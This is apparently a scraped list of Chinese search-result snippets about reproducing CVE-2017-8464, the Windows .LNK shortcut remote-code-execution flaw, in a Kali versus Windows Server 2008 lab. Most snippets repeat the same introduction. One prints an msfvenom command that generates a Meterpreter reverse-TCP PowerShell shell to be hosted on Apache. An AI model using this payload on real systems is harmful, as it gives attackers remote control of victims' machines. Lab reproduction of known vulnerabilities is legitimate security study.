2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危 传播的载体一般是LNK ,LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。 危害: 被攻击机插入存在攻击lnk...
CVE-2017-8464远程命令执行漏洞(震网漏洞)复现 2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。 漏洞描述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意...
CVE-2017-8464远程命令执行漏洞(震网漏洞)复现 2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。 漏洞描述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意...
[Shell]CVE-2017-8464漏洞复现 0x01 漏洞原理 Windows系统通过解析 .LNK 后缀文件时,是使用二进制来解析的,而当恶意的二进制代码被系统识别执行的时候就可以实现远程代码执行,由于是在explorer.exe进程中运行的,所以load进内存的时候与当前用户具有相同的权限。 于是攻击者利用这一解析过程的漏洞,将包含恶意二进制的...
CVE-2017-8464远程命令执⾏漏洞(震⽹漏洞)复现 前⾔ 2017年6⽉13⽇,微软官⽅发布编号为CVE-2017-8464的漏洞公告,官⽅介绍Windows系统在解析快捷⽅式时存在远程执⾏任意代码的⾼危漏洞,⿊客可以通过U盘、⽹络共享等途径触发漏洞,完全控制⽤户系统,安全风险⾼危 漏洞描述 攻击者可以向...
CVE-2017-8464远程命令执行漏洞(震网漏洞)复现 简介:2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
首先我们要准备好CVE-2017-8464的复现环境,kali虚拟机和windows server2008。 攻击机:kali IP:192.168.137.133 靶机:windows server2008 IP:192.168.137.132 1.打开kali终端,生成一个powershell文件 2.然后将生成的文件移动至/var/www/html目录下 3.开启apache服务 ...
0x03漏洞复现 1.打开kali,使用kali下的msfvenom生成一个ps1的shell msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.3.6 lport=9999 -f psh-reflection>/root/test/shell.ps1 2.将生成的shell.ps1复制到/var/www/html目录下,然后开启apache服务,在浏览器访问shell.ps1文件可直接访问 ...
CVE-2017-8464(远程执行命令)漏洞复现 for32-bitSystems•MicrosoftWindows10Version1607forx64-basedSystems•Microsoft...Windows10version1511for32-bitSystems•MicrosoftWindows10version1511forx64-basedSystems 微软发布Type 1字体解析远程代码执行漏洞补丁,建议用户尽快修补 ...
CVE-2017-8464远程命令执行漏洞复现 FreeBuf_352848 2021-01-13 10:12:06 281118 0x00漏洞概述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统...